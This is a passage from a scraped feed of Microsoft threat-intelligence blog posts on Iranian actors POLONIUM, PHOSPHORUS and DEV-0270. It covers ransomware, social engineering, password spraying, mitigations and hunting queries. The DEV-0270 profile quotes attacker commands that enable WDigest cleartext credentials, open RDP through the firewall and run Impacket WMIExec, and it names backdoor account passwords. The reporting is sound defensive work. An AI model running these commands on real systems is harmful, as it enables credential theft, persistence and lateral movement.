query:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepySnailURLParameters.yaml>\n\n#### Detect Base64-encoded/transmitted machine usernames or IP addresses \n\nCreepySnail also utilizes Base64-encoded parameters to transmit information from the victim to threat actor. The following queries detect machine usernames or IP addresses (based on Microsoft Defender for Endpoint logging) being transmitted under Base64 encoding in a web request:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/B64UserInWebURIFromMDE.yaml>\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/B64IPInURLFromMDE.yaml>\n\n#### Detect POLONIUM requests to predictable OneDrive file paths\n\nThe OneDrive capability that POLONIUM utilizes makes requests to predictable OneDrive file paths to access various folders and files. The following queries detect these paths in use:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepyDriveURLs.yaml>\n\n#### Detect sequence of request events related to unique CreepyDrive re-authentication attempts\n\nThe CreepyDrive implant makes a predictable sequence of requests to Microsoft authentication servers and OneDrive that can be detected using the following query:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepyDriveRequestSequence.yaml>\n\n#### Hunt for other suspicious encoded request parameters\n\nThe following hunting queries can be used to hunt for further suspicious encoded request parameters:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/CommonSecurityLog/B64IPInURL.yaml>\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/CommonSecurityLog/RiskyCommandB64EncodedInUrl.yaml>\n\nThe post [Exposing POLONIUM activity and infrastructure targeting Israeli organizations](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T16:00:00", "type": "mssecure", "title": "Exposing POLONIUM activity and infrastructure targeting Israeli organizations", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-02T16:00:00", "id": "MSSECURE:A2F131E46442125176E4853C860A816C", "href": "https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-07T21:16:51", "description": "Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of [Iranian actor PHOSPHORUS](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>). Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran. However, judging from their geographic and sectoral targeting, which often lacked a strategic value for the regime, we assess with low confidence that some of DEV-0270\u2019s ransomware attacks are a form of moonlighting for personal or company-specific revenue generation. This blog profiles the tactics and techniques behind the DEV-0270/PHOSPHORUS ransomware campaigns. We hope this analysis, which Microsoft is using to protect customers from related attacks, further exposes and disrupts the expansion of DEV-0270\u2019s operations.\n\nDEV-0270 leverages exploits for high-severity vulnerabilities to gain access to devices and is known for the early adoption of newly disclosed vulnerabilities. DEV-0270 also extensively uses living-off-the-land binaries (LOLBINs) throughout the attack chain for discovery and credential access. This extends to its abuse of the built-in BitLocker tool to encrypt files on compromised devices.\n\nIn some instances where encryption was successful, the time to ransom (TTR) between initial access and the ransom note was around two days. The group has been observed demanding USD 8,000 for decryption keys. In addition, the actor has been observed pursuing other avenues to generate income through their operations. In one attack, a victim organization refused to pay the ransom, so the actor opted to post the stolen data from the organization for sale packaged in an SQL database dump.\n\nUsing these observations, this blog details the group\u2019s tactics and techniques across its end-to-end attack chain to help defenders identify, investigate, and mitigate attacks. We also provide extensive hunting queries designed to surface stealthy attacks. This blog also includes protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\nFigure 1. Typical DEV-0270 attack chain\n\n## Who is DEV-0270?\n\nMicrosoft assesses that DEV-0270 is operated by a company that functions under two public aliases: Secnerd (secnerd[.]ir) and Lifeweb (lifeweb[.]ir). We have observed numerous infrastructure overlaps between DEV-0270 and Secnerd/Lifeweb. These organizations are also linked to Najee Technology Hooshmand (\u0646\u0627\u062c\u06cc \u062a\u06a9\u0646\u0648\u0644\u0648\u0698\u06cc \u0647\u0648\u0634\u0645\u0646\u062f), located in Karaj, Iran.\n\nThe group is typically opportunistic in its targeting: the actor scans the internet to find vulnerable servers and devices, making organizations with vulnerable and discoverable servers and devices susceptible to these attacks.\n\nAs with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\n## Observed actor activity\n\n### Initial access\n\nIn many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). For Exchange, the most prevalent exploit has been ProxyLogon\u2014this highlights the need to patch high-severity vulnerabilities in internet-facing devices, as the group has continued to successfully exploit these vulnerabilities even recently, well after updates supplied the fixes. While there have been indications that DEV-0270 attempted to exploit [Log4j 2 vulnerabilities](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>), Microsoft has not observed this activity used against customers to deploy ransomware.\n\n### Discovery\n\nUpon gaining access to an organization, DEV-0270 performs a series of discovery commands to learn more about the environment. The command [_wmic_](<https://docs.microsoft.com/windows/win32/wmisdk/wmic>)_ computersystem get domain _obtains the target\u2019s domain name. The _whoami_ command displays user information and _net user_ command is used to add or modify user accounts. For more information on the accounts created and common password phrases DEV-0270 used, refer to the Advanced Hunting section.\n\n * wmic computersystem get domain\n * whoami\n * net user\n\nOn the compromised Exchange server, the actor used the following command to understand the target environment.\n \n \n Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders\n\nFor discovery of domain controllers, the actor used the following PowerShell and WMI command.\n\n\n\n### Credential access\n\nDEV-0270 often opts for a particular method using a LOLBin to conduct their credential theft, as this removes the need to drop common credential theft tools more likely to be detected and blocked by antivirus and endpoint detection and response (EDR) solutions. This process starts by enabling WDigest in the registry, which results in passwords stored in cleartext on the device and saves the actor time by not having to crack a password hash.\n \n \n \"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\n\nThe actor then uses _rundll32.exe_ and _comsvcs.dll_ with its built-in MiniDump function to dump passwords from LSASS into a dump file. The command to accomplish this often specifies the output to save the passwords from LSASS. The file name is also reversed to evade detections (_ssasl.dmp)_:\n\n\n\n### Persistence\n\nTo maintain access in a compromised network, the DEV-0270 actor adds or creates a new user account, frequently named _DefaultAccount _with a password of _P@ssw0rd1234,_ to the device using the command _net user /add._ The _DefaultAccoun_t account is typically a pre-existing account set up but not enabled on most Windows systems.\n\nThe attacker then modifies the registry to allow remote desktop (RDP) connections for the device, adds a rule in the firewall using _netsh.exe_ to allow RDP connections, and adds the user to the remote desktop users group:\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v TSEnabled /t REG_DWORD /d 1 /f\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD\n \n \n \"netsh\" advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\n\nScheduled tasks are one of the recurrent methods used by DEV-0270 in their attacks to maintain access to a device. Generally, the tasks load via an XML file and are configured to run on boot with the least privilege to launch a .bat via the command prompt. The batch file results in a download of a renamed _dllhost.exe_, a reverse proxy, for maintaining control of the device even if the organization removes the file from the device.\n\nFigure 2. Scheduled task used in DEV-0270 attacks\n\n### Privilege escalation\n\nDEV-0270 can usually obtain initial access with administrator or system-level privileges by injecting their web shell into a privileged process on a vulnerable web server. When the group uses Impacket\u2019s WMIExec to move to other systems on the network laterally, they are typically already using a privileged account to run remote commands. DEV-0270 also commonly dumps LSASS, as mentioned in the credential access section, to obtain local system credentials and masquerade as other local accounts which might have extended privileges.\n\nAnother form of privilege escalation used by DEV-0270 involves the creation or activation of a user account to provide it with administrator privileges. DEV-0270 uses _powershell.exe_ and _net.exe_ commands to create or enable this account and add it to the administrators\u2019 group for higher privileges.\n\n### Defense evasion\n\nDEV-0270 uses a handful of defensive evasion techniques to avoid detection. The threat actors typically turn off Microsoft Defender Antivirus real-time protection to prevent Microsoft Defender Antivirus from blocking the execution of their custom binaries. The threat group creates or activates the _DefaultAccount_ account to add it to the Administrators and Remote Desktop Users groups. The modification of the _DefaultAccount_ provides the threat actor group with a legitimate pre-existing account with nonstandard, higher privileges. DEV-0270 also uses _powershell.exe_ to load their custom root certificate to the local certificate database. This custom certificate is spoofed to appear as a legitimate Microsoft-signed certificate. However, Windows flags the spoofed certificate as invalid due to the unverified certificate signing chain. This certificate allows the group to encrypt their malicious communications to blend in with other legitimate traffic on the network.\n\nAdditionally, DEV-0270 heavily uses native LOLBins to effectively avoid detection. The threat group commonly uses native WMI, net, CMD, and PowerShell commands and registry configurations to maintain stealth and operational security. They also install and masquerade their custom binaries as legitimate processes to hide their presence. Some of the legitimate processes they masquerade their tools as include: _dllhost.exe_, _task_update.exe_, _user.exe_, and _CacheTask_. Using .bat files and _powershell.exe_, DEV-0270 might terminate existing legitimate processes, run their binary with the same process name, and then configure scheduled tasks to ensure the persistence of their custom binaries.\n\n### Lateral movement\n\nDEV-0270 has been seen creating _defaultaccount_ and adding that account to the Remote Desktop Users group. The group uses the RDP connection to move laterally, copy tools to the target device, and perform encryption.\n\nAlong with RDP, [Impacket](<https://github.com/SecureAuthCorp/impacket/>)\u2019s WMIExec is a known toolkit used by the group for lateral movement. In multiple compromises, this was the main method observed for them to pivot to additional devices in the organization, execute commands to find additional high-value targets, and dump credentials for escalating privileges.\n\nAn example of a command using Impacket\u2019s WMIExec from a remote device:\n \n \n cmd.exe /Q /c quser 1> \\\\127.0.0.1\\ADMIN$\\__1657130354.2207212 2>&1\n\n### Impact\n\nDEV-0270 has been seen using _setup.bat_ commands to enable BitLocker encryption, which leads to the hosts becoming inoperable. For workstations, the group uses _DiskCryptor_, an open-source full disk encryption system for Windows that allows for the encryption of a device&#x27;s entire hard drive. The group drops _DiskCryptor_ from an RDP session and when it is launched, begins the encryption. This method does require a reboot to install and another reboot to lock out access to the workstation.\n\nThe following are DEV-0270\u2019s PowerShell commands using BitLocker:\n\n\n\nMicrosoft will continue to monitor DEV-0270 and PHOSPHORUS activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended mitigation steps\n\nThe techniques used by DEV-0270 can be mitigated through the following actions:\n\n * Apply the [corresponding security updates for Exchange Server](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>), including applicable fixes for [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>). While it is important to prioritize patching of internet-facing Exchange servers to mitigate risk in an ordered manner, unpatched internal Exchange Server instances should also be addressed as soon as possible.\n * For Exchange Server instances in Mainstream Support, critical product updates are released for the most recently released Cumulative Updates (CU) and for the previous CU. For Exchange Server instances in Extended Support, critical product updates are released for the most recently released CU only.\n * If you don&#x27;t have a supported CU, Microsoft is producing an additional series of security updates (SUs) that can be applied to some older and unsupported CUs to help customers more quickly protect their environment. For information on these updates, see March 2021 Exchange Server Security Updates for older Cumulative Updates of Exchange Server.\n * Installing the updates is the only complete mitigation for these vulnerabilities and has no impact on functionality. If the threat actor has exploited these vulnerabilities to install malware, installing the updates _does not_ remove implanted malware or evict the actor.\n * Use [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among devices whenever possible. This limits lateral movement and other attack activities.\n * Check your perimeter firewall and proxy to restrict or prevent network appliances like Fortinet SSL VPN devices from making arbitrary connections to the internet to browse or download files.\n * Enforce strong local administrator passwords. Use tools like [LAPS](<https://docs.microsoft.com/previous-versions/mt227395\\(v=msdn.10\\)?redirectedfrom=MSDN>).\n * Ensure that [Microsoft Defender Antivirus](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) is up to date and that real-time behavior monitoring is enabled.\n * Keep backups so you can recover data affected by destructive attacks. Use controlled folder access to prevent unauthorized applications from modifying protected files.\n * Turn on the following [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat:\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n * Block process creations originating from PsExec and WMI commands\n * Block persistence through WMI event subscription. Ensure that Microsoft Defender for Endpoint is up to date and that real-time behavior monitoring is enabled\n\n## Detection details\n\n### Microsoft Defender for Endpoint\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Malware associated with DEV-0270 activity group detected\n\nThe following additional alerts may also indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\nA script with suspicious content was observed| Suspicious file dropped by Exchange Server process \n---|--- \nA suspicious file was observed| Suspicious Modify Registry \nAnomalous behavior by a common executable| Suspicious Permission Groups Discovery \nLazagne post-exploitation tool| Suspicious PowerShell command line \nLocal Emails Collected| Suspicious PowerShell download or encoded command execution \nMimikatz credential theft tool| Suspicious Process Discovery \n&#x27;Mimilove&#x27; high-severity malware was prevented| Suspicious process executed PowerShell command \nNew group added suspiciously| Suspicious process launched using dllhost.exe \nOngoing hands-on-keyboard attack via Impacket toolkit| Suspicious &#x27;PShellCobStager&#x27; behavior was blocked \nPossible Antimalware Scan Interface (AMSI) tampering| Suspicious Scheduled Task Process Launched \nPossible attempt to discover groups and permissions| Suspicious sequence of exploration activities \nPossible exploitation of Exchange Server vulnerabilities| Suspicious &#x27;SuspExchgSession&#x27; behavior was blocked \nPossible exploitation of ProxyShell vulnerabilities| Suspicious System Network Configuration Discovery \nPossible web shell installation| Suspicious System Owner/User Discovery \nProcess memory dump| Suspicious Task Scheduler activity \nSuspicious Account Discovery: Email Account| Suspicious User Account Discovery \nSuspicious behavior by cmd.exe was observed| Suspicious user password change \nSuspicious behavior by svchost.exe was observed| Suspicious w3wp.exe activity in Exchange \nSystem file masquerade \nSuspicious behavior by Web server process| Tampering with the Microsoft Defender for Endpoint sensor \nSuspicious Create Account| Unusual sequence of failed logons \nSuspicious file dropped| WDigest configuration change \n \n## Hunting queries\n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for the related malicious activity in their environments.\n\n**DEV-0270 registry IOC**\n\nThis query identifies modification of registry by DEV-0270 actor to disable security feature as well as to add ransom notes:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270RegistryIOCSep2022.yaml>\n\n**DEV-0270 malicious PowerShell usage**\n\nDEV-0270 heavily uses PowerShell to achieve their objective at various stages of their attack. This query locates PowerShell activity tied to the actor:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270PowershellSep2022.yaml>\n\n**DEV-0270 WMIC discovery**\n\nThis query identifies _dllhost.exe_ using WMIC to discover additional hosts and associated domains in the environment:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270WMICDiscoverySep2022.yaml>\n\n**DEV-0270 new user creation**\n\nThis query tries to detect creation of a new user using a known DEV-0270 username/password schema:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270NewUserSep2022.yaml>\n\n### Microsoft 365 Defender\n\nTo locate possible actor activity, run the following queries.\n\n**Disable services via registry** \nSearch for processes modifying the registry to disable security features. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Disabling%20Services%20via%20Registry.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(@\u2019\u201dreg\u201d\u2019, \u2018add\u2019, @\u2019\u201dHKLM\\SOFTWARE\\Policies\\\u2019, \u2018/v\u2019,\u2019/t\u2019, \u2018REG_DWORD\u2019, \u2018/d\u2019, \u2018/f\u2019)\n and InitiatingProcessCommandLine has_any(\u2018DisableRealtimeMonitoring\u2019, \u2018UseTPMKey\u2019, \u2018UseTPMKeyPIN\u2019, \u2018UseAdvancedStartup\u2019, \u2018EnableBDEWithNoTPM\u2019, \u2018RecoveryKeyMessageSource\u2019)\n\n**Modifying the registry to add a ransom message notification**\n\nIdentify registry modifications that are indicative of a ransom note tied to DEV-0270. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Modifying%20the%20registry%20to%20add%20a%20ransom%20message%20notification.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(\u2018\u201dreg\u201d\u2019, \u2018add\u2019, @\u2019\u201dHKLM\\SOFTWARE\\Policies\\\u2019, \u2018/v\u2019,\u2019/t\u2019, \u2018REG_DWORD\u2019, \u2018/d\u2019, \u2018/f\u2019, \u2018RecoveryKeyMessage\u2019, \u2018Your drives are Encrypted!\u2019, \u2018@\u2019)\n\n**DLLHost.exe file creation via PowerShell**\n\nIdentify masqueraded _DLLHost.exe_ file created by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20file%20creation%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \u2018powershell.exe\u2019\n | where InitiatingProcessCommandLine has_all(\u2018$file=\u2019, \u2018dllhost.exe\u2019, \u2018Invoke-WebRequest\u2019, \u2018-OutFile\u2019)\n\n**Add malicious user to Admins and RDP users group via PowerShell**\n\nLook for adding a user to Administrators in remote desktop users via 